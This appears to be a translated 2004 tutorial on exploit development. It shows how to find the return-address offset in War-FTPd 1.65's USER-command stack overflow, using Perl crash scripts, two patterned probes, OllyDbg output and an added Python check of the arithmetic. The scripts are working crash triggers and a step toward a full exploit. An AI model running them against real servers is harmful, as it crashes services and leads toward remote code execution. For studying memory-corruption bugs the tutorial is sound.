Using two points to locate the overflow point
Security Angel · Superhei [BST], 2004-11-25

Vulnerable software: War-FTPd version 1.65
Debugger: OllyDbg
Language: Perl
Vulnerability: a crafted USER command causes a stack overflow. For background, see "Win32 buffer overflow", http://www.ph4nt0m.org/doc/20041101160955.pdf.

We first write a script that imitates an FTP login and submits USER followed by AAAA.... The command-line argument gives the number of A's to submit; locating the overflow point means finding how many A's we have to send before our data just overwrites RET.

------------- CODZ-START -----------------
#!/usr/bin/perl
use IO::Socket;
$argc = @ARGV;
$host = "127.0.0.1";
$port = "2121";
$eff  = $ARGV[0];                 # number of bytes to send after "USER "
$buff = 'A' x $eff;
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
    || die "Sorry! Could not connect to $host\n";
print $sock "USER $buff\n";
print "USER $buff\n";             # echo what was sent
close $sock;
------------- CODZ-END -------------------

Below we use two points to determine this $eff. First load War-FTPd in OllyDbg and run it, then run the script:

C:/usr/bin> exp.pl 800
USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...AAAA   (800 A's)

When we submit 800 A's the overflow is triggered, and War-FTPd's EIP reads 41414141 :).

This method first appeared in Hacker Defence magazine; the example is still the War-FTPd 1.65 USER vulnerability.

First overflow code:

------------- CODZ-START -----------------
#!/usr/bin/perl
use IO::Socket;
$host = "127.0.0.1";
$port = "2121";
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
    || die "Sorry! Could not connect to $host\n";
print $sock "USER ";
# key code
for ($i = 0; $i < 800; $i++) {
    $k = $i % 10 + 100;           # <== note here: cycles through 'd'..'m' (0x64..0x6d)
    print $sock chr($k);
    print chr($k);                # echo what was sent
}
print $sock "\n";
close $sock;
------------- CODZ-END -------------------

Load War-FTPd in OllyDbg and run it, then run the script:

C:/usr/bin> buff1.pl
defghijklmdefghijklmdefghijklmdefghijklm...defghijklm   (800 bytes)

The bytes we submit are the decimal values 100 to 109, that is the letters d to m, and they determine the low digit: the position within a group of ten. The overflow is triggered and EIP is 0x6c6b6a69, the letters "lkji". The machine stores the value little-endian, so the order is reversed and the first byte that overwrote RET is the letter i, 0x69. The group starts at d, 0x64, so within its group of ten the buff starts to overwrite RET at position 0x69 - 0x64 = 5.

Second overflow code:

------------- CODZ-START -----------------
#!/usr/bin/perl
use IO::Socket;
$host = "127.0.0.1";
$port = "2121";
my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host, PeerPort => $port)
    || die "Sorry! Could not connect to $host\n";
print $sock "USER ";
# key code
for ($i = 0; $i < 800; $i++) {
    $k = int($i / 10) + 100;      # <== note here: ten copies of each value, starting at 'd'
    print $sock chr($k);
    print chr($k);                # echo what was sent
}
print $sock "\n";
close $sock;
------------- CODZ-END -------------------

Reload War-FTPd in OllyDbg and run it, then run the script:

C:/usr/bin> buff1.pl
ddddddddddeeeeeeeeeeffffffffffgggggggggghhhhhhhhhh...   (800 bytes; values above 0x7f echo as garbage characters)

This run determines which group of ten the overflow falls in: the byte in EIP is 0x94, and 0x94 - 0x64 = 48. Combining the two points gives the overflow point: (0x94 - 0x64) x 10 + (0x69 - 0x64) = 485. That is, when the submitted buff is 485 bytes long, the bytes that follow begin to overwrite RET.
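The following Python is an added example, not part of the original article: it reproduces the byte patterns of the two Perl probes above and the arithmetic that combines the two crash EIPs into the RET offset, generalised to any group size. The `simulate_crash` helper is a constructed stand-in for reading EIP in OllyDbg; the sample EIP values are the ones the article reports.

```python
# Two-point overflow location (added example; the article's own scripts are Perl).
# Probe 1 ("fine"): byte value cycles through 'd'..'m' every GROUP positions.
# Probe 2 ("coarse"): byte value advances by one every GROUP positions.
BASE = 0x64   # 'd', the first byte value both probes start from
GROUP = 10    # period of the fine probe / run length of the coarse probe


def probe_fine(n=800, base=BASE, group=GROUP):
    """Same bytes as the first Perl script: k = i % group + base."""
    return bytes(i % group + base for i in range(n))


def probe_coarse(n=800, base=BASE, group=GROUP):
    """Same bytes as the second Perl script: k = i // group + base.

    With n=800 the values run up to 0xB3; once they pass 0x7f they are no
    longer printable, which is why the article's echoed output turns into
    garbage characters towards the end."""
    return bytes(i // group + base for i in range(n))


def offset_from_eips(eip_fine, eip_coarse, base=BASE, group=GROUP):
    """Combine the two crash EIPs into the byte offset at which RET begins.

    x86 is little-endian, so the lowest byte of EIP is the first pattern byte
    that landed on RET. The fine probe gives the position inside a group, the
    coarse probe gives the group index."""
    pos_in_group = (eip_fine & 0xFF) - base
    group_index = (eip_coarse & 0xFF) - base
    if not 0 <= pos_in_group < group:
        raise ValueError("fine-probe EIP byte is not from the pattern")
    if group_index < 0:
        raise ValueError("coarse-probe EIP byte is not from the pattern")
    return group_index * group + pos_in_group


def simulate_crash(payload, ret_offset):
    """Constructed stand-in for OllyDbg: the four payload bytes that overwrite
    RET at ret_offset, read back as the little-endian EIP the debugger shows."""
    return int.from_bytes(payload[ret_offset:ret_offset + 4], "little")


if __name__ == "__main__":
    # EIP values the article reports for War-FTPd 1.65.
    print(offset_from_eips(0x6C6B6A69, 0x94949494))        # 485
    # Round trip: a RET at offset 485 yields exactly those two EIPs.
    assert simulate_crash(probe_fine(), 485) == 0x6C6B6A69
    assert simulate_crash(probe_coarse(), 485) == 0x94949494
```

The round trip at the bottom is the check worth keeping in practice: if the two EIPs a debugger shows cannot be regenerated from the probes at the computed offset, a byte in the pattern was altered in transit and the offset is not trustworthy.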